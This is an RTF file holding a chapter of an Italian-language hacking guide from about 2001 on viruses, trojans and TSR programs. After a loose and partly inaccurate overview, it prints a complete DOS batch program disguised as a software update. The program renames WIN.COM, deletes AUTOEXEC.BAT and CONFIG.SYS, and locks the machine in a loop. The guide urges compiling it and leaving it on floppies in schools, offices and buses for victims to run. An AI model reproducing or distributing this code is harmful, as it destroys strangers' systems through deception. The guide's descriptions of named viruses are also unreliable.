{\rtf1\ansi\ansicpg1252\uc1 \deff0\deflang1040\deflangfe1040{\fonttbl{\f0\froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}
{\f28\froman\fcharset238\fprq2 Times New Roman CE;}{\f29\froman\fcharset204\fprq2 Times New Roman Cyr;}{\f31\froman\fcharset161\fprq2 Times New Roman Greek;}{\f32\froman\fcharset162\fprq2 Times New Roman Tur;}
{\f33\froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\f34\froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f35\froman\fcharset186\fprq2 Times New Roman Baltic;}{\f44\fmodern\fcharset238\fprq1 Courier New CE;}
{\f45\fmodern\fcharset204\fprq1 Courier New Cyr;}{\f47\fmodern\fcharset161\fprq1 Courier New Greek;}{\f48\fmodern\fcharset162\fprq1 Courier New Tur;}{\f49\fmodern\fcharset177\fprq1 Courier New (Hebrew);}
{\f50\fmodern\fcharset178\fprq1 Courier New (Arabic);}{\f51\fmodern\fcharset186\fprq1 Courier New Baltic;}}{\colortbl;\red0\green0\blue0;\red0\green0\blue255;\red0\green255\blue255;\red0\green255\blue0;\red255\green0\blue255;\red255\green0\blue0;
\red255\green255\blue0;\red255\green255\blue255;\red0\green0\blue128;\red0\green128\blue128;\red0\green128\blue0;\red128\green0\blue128;\red128\green0\blue0;\red128\green128\blue0;\red128\green128\blue128;\red192\green192\blue192;}{\stylesheet{
\ql \li0\ri0\widctlpar\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0 \fs24\lang1040\langfe1040\cgrid\langnp1040\langfenp1040 \snext0 Normal;}{\*\cs10 \additive Default Paragraph Font;}}{\info{\author The Knower}{\operator The Knower}
{\creatim\yr2001\mo12\dy2\hr22\min6}{\revtim\yr2001\mo12\dy2\hr22\min6}{\version2}{\edmins1}{\nofpages1}{\nofwords355}{\nofchars2027}{\nofcharsws2489}{\vern8249}}\margl1134\margr1134\margt1417\margb1134 
\widowctrl\ftnbj\aenddoc\hyphhotz283\noxlattoyen\expshrtn\noultrlspc\dntblnsbdb\nospaceforul\hyphcaps0\horzdoc\dghspace120\dgvspace120\dghorigin1701\dgvorigin1984\dghshow0\dgvshow3\jcompress\viewkind4\viewscale100\nolnhtadjtbl \fet0\sectd 
\linex0\sectdefaultcl {\*\pnseclvl1\pnucrm\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl2\pnucltr\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang
{\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl6\pnlcltr\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl7\pnlcrm\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl8
\pnlcltr\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl9\pnlcrm\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}\pard\plain \ql \li0\ri0\nowidctlpar\faauto\rin0\lin0\itap0 \fs24\lang1040\langfe1040\cgrid\langnp1040\langfenp1040 {
\f2\fs20 \tab __________________________________
\par \tab 12. Virus, TSR e altri programmini:
\par \tab \'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af\'af
\par 
\par I virus sono composti da una serie di righe di file che si accodano ai file
\par normali infettandoli. Queste riche possono trascriversi da un file all'altro
\par (infezione) o auto-eseguirsi (distruzione). Esistono talmente tanti tipi di
\par virus che \'e8 inutile sbattersi a inventarne di nuovi. Spesso si possono trovare
\par delle copie dei virus negli stessi anti virus. In rete si trovano anche dei
\par bellissimi programmi per creare virus; uno di questi \'e8 NRLG.
\par Una sottocategoria dei virus sono i cosiddetti Cavalli di troia (Trojan Horses)
\par che sono praticamente dei virus che permettono di entrare nei computer altrui.
\par I TSR, invece sono dei programmi normali che rimangono carica in memoria fino
\par allo spegnimento del computer. Se il file che esegue questo programma \'e8 infetto,
\par il vostro computer \'e8 spacciato.
\par Ci sono dei virus a dir poco favolosi come il Chi che cancella il BIOS o
\par Melissa che comincia a creare delle cartelle con tutte le combinazioni di caratteri;
\par quando sono esauriti tutti i caratteri, entra nella prima cartella e ricomincia
\par l'opera fino all'esaurimento del disco fisso.
\par Penso comunque che il virus pi\'f9 spettacolare sia il 17 novembre c perch\'e8
\par pur essendo un virus "normale" \'e8 bastardo dentro perch\'e8 infetta tutto e tutti
\par indiscriminatamente.
\par Se volete strare tranquilli, per\'f2, conviene stare sull'artigianale: per rovinare
\par un computer non \'e8 indispensabile infettarlo con un virus, ma \'e8 sufficiente un
\par programmino stronzo come questo:
\par       @rem --------------- Comincia a copiare da qui --------------
\par \tab }{\f2\fs20\lang2057\langfe1040\langnp2057 @ECHO OFF
\par \tab CLS
\par \tab ECHO.
\par \tab }{\f2\fs20 ECHO ATTENDERE PREGO, AGGIORNAMENTO IN CORSO...
\par \tab }{\f2\fs20\lang2057\langfe1040\langnp2057 ECHO.
\par \tab C:
\par \tab CD\\WINDOWS
\par \tab REN WIN.COM WIN2.COM
\par \tab CD..
\par \tab DEL AUTOEXEC.BAT
\par \tab DEL CONFIG.SYS
\par \tab }{\f2\fs20 CLS
\par \tab ECHO.
\par \tab ECHO Aggiornamento completato, grazie per aver scelto il nostro programma.
\par \tab }{\f2\fs20\lang2057\langfe1040\langnp2057 echo.
\par \tab echo                                                        By Fogman.
\par \tab }{\f2\fs20 echo.
\par \tab :a
\par \tab pause >nul
\par \tab goto a
\par       rem ------------------ fino qui ------------------
\par 
\par E il computer della nostra vittima \'e8 bloccato!
\par Per fare le cose meglio \'e8 possibile salvare questo file con il nome PAMELA.BAT,
\par trasformarlo in un eseguibile non disassemblabile con il programma BAT2COM.EXE
\par e creare il file PAMELA.COM, copiare il file su un floppy e "dimenticare" il
\par dischetto a scuola, in ufficio, al bar, sul pullman, dove volete.
\par Se non siete capaci di scrivere fate pure un copia-incolla da qua sopra.
\par 
\par 
\par 
\par }}
